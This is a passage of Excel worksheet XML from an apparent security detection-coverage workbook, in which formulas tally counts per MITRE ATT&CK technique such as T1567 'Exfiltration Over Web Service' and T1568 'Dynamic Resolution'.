        <v>12 (1208)</v>
      </c>
      <c r="J59" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>4</v>
      </c>
      <c r="K59" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>7</v>
      </c>
      <c r="M59" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>29</v>
      </c>
      <c r="N59" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>28</v>
      </c>
      <c r="O59" s="322" t="str">
        <f t="shared" si="1"/>
        <v>28 (29)</v>
      </c>
      <c r="P59" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>6</v>
      </c>
      <c r="Q59" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0.5</v>
      </c>
      <c r="R59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>13</v>
      </c>
      <c r="S59" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>1237</v>
      </c>
      <c r="T59" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>40</v>
      </c>
      <c r="U59" s="4" t="str">
        <f t="shared" si="2"/>
        <v>40 (1237)</v>
      </c>
      <c r="V59" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>10</v>
      </c>
      <c r="W59" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>20</v>
      </c>
      <c r="Y59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>1220</v>
      </c>
      <c r="Z59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>22</v>
      </c>
      <c r="AA59" s="322" t="str">
        <f t="shared" si="3"/>
        <v>22 (1220)</v>
      </c>
      <c r="AB59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>10</v>
      </c>
      <c r="AC59" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>11</v>
      </c>
      <c r="AE59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>91</v>
      </c>
      <c r="AF59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>60</v>
      </c>
      <c r="AG59" s="322" t="str">
        <f t="shared" si="4"/>
        <v>60 (91)</v>
      </c>
      <c r="AH59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>16</v>
      </c>
      <c r="AI59" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>31</v>
      </c>
      <c r="AK59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>1311</v>
      </c>
      <c r="AL59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>82</v>
      </c>
      <c r="AM59" s="322" t="str">
        <f t="shared" si="5"/>
        <v>82 (1311)</v>
      </c>
      <c r="AN59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>28</v>
      </c>
      <c r="AO59" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>39</v>
      </c>
      <c r="AQ59" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR59" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS59" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT59" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU59" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>3</v>
      </c>
      <c r="AX59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>2</v>
      </c>
      <c r="AY59" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (3)</v>
      </c>
      <c r="AZ59" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>2</v>
      </c>
      <c r="BA59" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>2</v>
      </c>
      <c r="BC59" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>1240</v>
      </c>
      <c r="BD59" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>42</v>
      </c>
      <c r="BE59" s="4" t="str">
        <f t="shared" si="8"/>
        <v>42 (1240)</v>
      </c>
      <c r="BF59" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>12</v>
      </c>
      <c r="BG59" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>20</v>
      </c>
      <c r="BI59" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>3</v>
      </c>
      <c r="BJ59" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK59" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (3)</v>
      </c>
      <c r="BL59" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM59" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0.5</v>
      </c>
      <c r="BN59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO59" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>176</v>
      </c>
      <c r="BP59" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>175</v>
      </c>
      <c r="BQ59" s="4" t="str">
        <f t="shared" si="10"/>
        <v>175 (176)</v>
      </c>
      <c r="BR59" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS59" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>7</v>
      </c>
      <c r="BT59" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU59" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B59,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>170</v>
      </c>
      <c r="BV59" s="292">
        <v>3</v>
      </c>
      <c r="BW59" s="322">
        <v>3</v>
      </c>
      <c r="BX59" s="4" t="str">
        <f t="shared" si="11"/>
        <v>3 (3)</v>
      </c>
      <c r="BY59" s="12">
        <v>2</v>
      </c>
      <c r="BZ59" s="13">
        <v>1</v>
      </c>
      <c r="CA59" s="394">
        <v>2</v>
      </c>
      <c r="CB59" s="288">
        <v>6</v>
      </c>
      <c r="CC59" s="4">
        <v>5</v>
      </c>
      <c r="CD59" s="4" t="str">
        <f t="shared" si="12"/>
        <v>5 (6)</v>
      </c>
      <c r="CE59" s="4">
        <v>2</v>
      </c>
      <c r="CF59" s="4">
        <v>2</v>
      </c>
      <c r="CG59" s="13">
        <v>1</v>
      </c>
      <c r="CH59" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="60" spans="1:86" ht="15" customHeight="1">
      <c r="A60" s="4">
        <f t="shared" si="13"/>
        <v>58</v>
      </c>
      <c r="B60" s="4" t="str">
        <f>IFERROR(VLOOKUP(A60,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1567</v>
      </c>
      <c r="C60" s="493" t="str">
        <f>IFERROR(VLOOKUP(B60,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Web Service</v>
      </c>
      <c r="D60" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B60)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E60" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>26</v>
      </c>
      <c r="F60" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (26)</v>
      </c>
      <c r="G60" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>5</v>
      </c>
      <c r="H60" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>5</v>
      </c>
      <c r="I60" s="322" t="str">
        <f t="shared" si="0"/>
        <v>5 (5)</v>
      </c>
      <c r="J60" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>3</v>
      </c>
      <c r="K60" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M60" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N60" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O60" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P60" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q60" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S60" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>5</v>
      </c>
      <c r="T60" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>5</v>
      </c>
      <c r="U60" s="4" t="str">
        <f t="shared" si="2"/>
        <v>5 (5)</v>
      </c>
      <c r="V60" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="W60" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>7</v>
      </c>
      <c r="Z60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>7</v>
      </c>
      <c r="AA60" s="322" t="str">
        <f t="shared" si="3"/>
        <v>7 (7)</v>
      </c>
      <c r="AB60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="AC60" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>12</v>
      </c>
      <c r="AF60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>11</v>
      </c>
      <c r="AG60" s="322" t="str">
        <f t="shared" si="4"/>
        <v>11 (12)</v>
      </c>
      <c r="AH60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>3</v>
      </c>
      <c r="AI60" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>10</v>
      </c>
      <c r="AK60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>19</v>
      </c>
      <c r="AL60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>18</v>
      </c>
      <c r="AM60" s="322" t="str">
        <f t="shared" si="5"/>
        <v>18 (19)</v>
      </c>
      <c r="AN60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>7</v>
      </c>
      <c r="AO60" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>11</v>
      </c>
      <c r="AQ60" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR60" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS60" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT60" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU60" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY60" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ60" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA60" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC60" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>5</v>
      </c>
      <c r="BD60" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>5</v>
      </c>
      <c r="BE60" s="4" t="str">
        <f t="shared" si="8"/>
        <v>5 (5)</v>
      </c>
      <c r="BF60" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG60" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI60" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>2</v>
      </c>
      <c r="BJ60" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>2</v>
      </c>
      <c r="BK60" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (2)</v>
      </c>
      <c r="BL60" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM60" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO60" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>13</v>
      </c>
      <c r="BP60" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>13</v>
      </c>
      <c r="BQ60" s="4" t="str">
        <f t="shared" si="10"/>
        <v>13 (13)</v>
      </c>
      <c r="BR60" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS60" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>3</v>
      </c>
      <c r="BT60" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU60" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B60,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>11</v>
      </c>
      <c r="BV60" s="292">
        <v>2</v>
      </c>
      <c r="BW60" s="322">
        <v>2</v>
      </c>
      <c r="BX60" s="4" t="str">
        <f t="shared" si="11"/>
        <v>2 (2)</v>
      </c>
      <c r="BY60" s="12">
        <v>1</v>
      </c>
      <c r="BZ60" s="13">
        <v>1</v>
      </c>
      <c r="CA60" s="394">
        <v>2</v>
      </c>
      <c r="CB60" s="288">
        <v>4</v>
      </c>
      <c r="CC60" s="4">
        <v>4</v>
      </c>
      <c r="CD60" s="4" t="str">
        <f t="shared" si="12"/>
        <v>4 (4)</v>
      </c>
      <c r="CE60" s="4">
        <v>1</v>
      </c>
      <c r="CF60" s="4">
        <v>1</v>
      </c>
      <c r="CG60" s="13">
        <v>1</v>
      </c>
      <c r="CH60" s="394">
        <v>2</v>
      </c>
    </row>
    <row r="61" spans="1:86" ht="15" customHeight="1">
      <c r="A61" s="4">
        <f t="shared" si="13"/>
        <v>59</v>
      </c>
      <c r="B61" s="4" t="str">
        <f>IFERROR(VLOOKUP(A61,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1568</v>
      </c>
      <c r="C61" s="493" t="str">
        <f>IFERROR(VLOOKUP(B61,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Dynamic Resolution</v>
      </c>
      <c r="D61" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B61)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E61" s="493">
